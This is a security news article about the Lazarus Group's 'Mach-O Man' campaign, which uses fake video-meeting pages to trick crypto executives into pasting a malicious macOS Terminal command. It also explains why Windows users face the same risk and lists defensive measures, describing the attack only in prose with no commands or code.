A sophisticated social engineering campaign orchestrated by North Korea’s Lazarus Group is luring cryptocurrency and fintech executives into pasting malicious terminal commands on macOS, aiming to steal credentials and digital assets. Disclosed by blockchain security firm CertiK in April 2026, the campaign—dubbed Mach-O Man—uses fake meeting invitations for Zoom, Microsoft Teams, and Google Meet to trick victims into executing malware. While the technical payload is currently macOS-specific, the attack’s methodology underscores a cross-platform threat that Windows users and organizations must heed.

How the Mach-O Man Campaign Unfolds

The attack begins with a spear-phishing email tailored to high-value targets, often executives with access to crypto wallets or sensitive financial systems. The email includes a calendar invite or link purporting to be for a meeting on a popular video conferencing platform. When the recipient clicks the link, they land on a convincing but fraudulent replica of a Zoom, Teams, or Google Meet page.

Instead of a direct download, the page instructs the user to open the Terminal app on macOS and paste a pre-written command. The command appears legitimate—often disguised as a system update or a necessary component for the meeting—but in reality, it downloads and executes a Mach-O executable, the native binary format for macOS. This multi-step social engineering technique bypasses traditional browser-based download protections because the user voluntarily initiates the dangerous action.

Once executed, the malware establishes persistence and begins harvesting credentials from keychain data, browser password stores, and cryptocurrency wallet applications. It also deploys a backdoor for lateral movement, enabling attackers to pivot within corporate networks if the victim’s machine is connected to an enterprise environment.

The Specialized macOS Payload

The Mach-O Man moniker reflects the malware’s use of the Mach-O file format, a design choice that signals a shift in Lazarus Group’s operations. Historically, the group has favored Windows-based malware, but as macOS adoption grows among developers and crypto entrepreneurs, the attack surface has expanded. The payload shares code similarities with previous Lazarus tools, including the ability to evade signature-based detection by using novel compilation techniques and string obfuscation.

CertiK’s analysis indicates the malware is modular. Its initial dropper—the small script pasted into Terminal—fetches second-stage components from command-and-control servers. These modules include a keylogger, screenshot capture, and the ability to execute arbitrary commands. The focus on crypto wallets is evident: it specifically searches for files related to MetaMask, Ledger Live, Trezor Suite, and other popular wallet applications, transmitting them to attacker-controlled infrastructure.

Lazarus Group: A Persistent Threat

Lazarus Group, also tracked as APT38 or BlueNoroff, is a financially motivated arm of North Korea’s intelligence apparatus. The group has been linked to high-profile heists, including the $600 million Ronin Bridge attack and the theft of $100 million from Harmony’s Horizon Bridge. Its operations fund the regime’s weapons programs, making every incident a matter of global security.

The shift to macOS reflects the group’s agility. In 2023, it used the RustBucket campaign to target macOS via corrupted PDFs. Mach-O Man demonstrates an evolution in delivery methods, leveraging collaboration tool impersonation—a technique that exploded during the remote-work era. By mimicking Zoom, Teams, and Google Meet, the attackers exploit the implicit trust that professionals place in these platforms.

Why Windows Users Are Not Immune

While the current Mach-O Man payload is macOS-specific, the social engineering framework is platform-agnostic. Windows users could face identical phishing lures that direct them to run PowerShell or Command Prompt scripts. Lazarus and other advanced persistent threat (APT) groups have extensive Windows malware arsenals ready to deploy.

Microsoft Defender Threat Intelligence has previously warned of Lazarus impersonating crypto exchanges and job recruiters to distribute Windows trojans like AppleJeus and Vyveva. The fake meeting invite tactic could easily be repurposed: a fraudulent Teams link might instruct a Windows user to press Win+R and paste a PowerShell snippet, leading to the same catastrophic outcome.

Organizations with mixed-device environments are especially vulnerable. A compromised macOS executive could provide a foothold for attackers to later target Windows servers and workstations through credential reuse and lateral movement. The fundamental lesson—never paste unknown commands into a terminal or run dialog—applies universally.

Broader Implications for Corporate Security

The Mach-O Man campaign reveals a critical weakness: many enterprises still lack controls to prevent users from executing harmful commands. Endpoint detection and response (EDR) solutions often monitor for known malware signatures or anomalous process chains, but user-initiated terminal actions can blend in with legitimate developer or IT activity.

Security awareness training must evolve beyond spotting phishing emails. Employees—especially high-value targets—need concrete guidance to never execute commands from untrusted sources, even if prompted by a seemingly official website. Technical controls can help: macOS’s Gatekeeper and Windows’ SmartScreen can be complemented with policies that restrict Terminal or PowerShell execution to signed scripts only. However, social engineering can bypass even these safeguards if users are sufficiently deceived.

CertiK’s report emphasizes that the campaign is highly targeted. The fake meeting pages are customized with the victim’s name and company, indicating previous reconnaissance. This level of detail suggests that attackers may have scraped professional networking sites or compromised mailing lists to identify and profile targets.

Defensive Measures for Individuals and Teams

For cryptocurrency holders and fintech executives, immediate steps can reduce risk:

  • Verify meeting links directly — Instead of clicking email links, log into the meeting platform’s official app or website and check for upcoming appointments.
  • Never paste commands from external sources — Treat any instruction to open Terminal, PowerShell, or Command Prompt as a red flag.
  • Use hardware wallets for large crypto holdings — The malware seeks software wallets; hardware devices are harder to compromise.
  • Enable multi-factor authentication (MFA) everywhere — Even if credentials are stolen, MFA can block unauthorized access.
  • Monitor for unusual outbound network traffic — A sudden connection to an unfamiliar IP could indicate data exfiltration.

IT departments should deploy application allowlisting, restrict command-line interpreters for non-IT staff, and regularly simulate social engineering tests that include fake terminal prompts. Sharing threat intelligence through bodies like the Financial Services Information Sharing and Analysis Center (FS-ISAC) can help organizations stay ahead of Lazarus’s evolving playbook.

The Bigger Picture: Cybercrime as Statecraft

The Mach-O Man campaign is not an isolated incident but part of a sustained, state-sponsored campaign to siphon funds from the global crypto economy. North Korea’s cyber operations are estimated to generate up to a third of its foreign currency income, according to a UN panel of experts. Each successful attack funds both the regime’s survival and its weapons proliferation.

For Windows users, the takeaway is clear: platform-specific malware is merely one head of a hydra. The underlying social engineering principles are universal. As collaboration tools become more central to business, they will be increasingly weaponized. Vigilance against such threats must be a core component of cyber hygiene, regardless of operating system.

CertiK’s disclosure should serve as a wake-up call for security teams to reassess their defenses against command-execution attacks. With Lazarus Group continually innovating, the line between phishing and system-level compromise has never been thinner—and it’s a line that every user, from the C-suite to the helpdesk, must learn to recognize.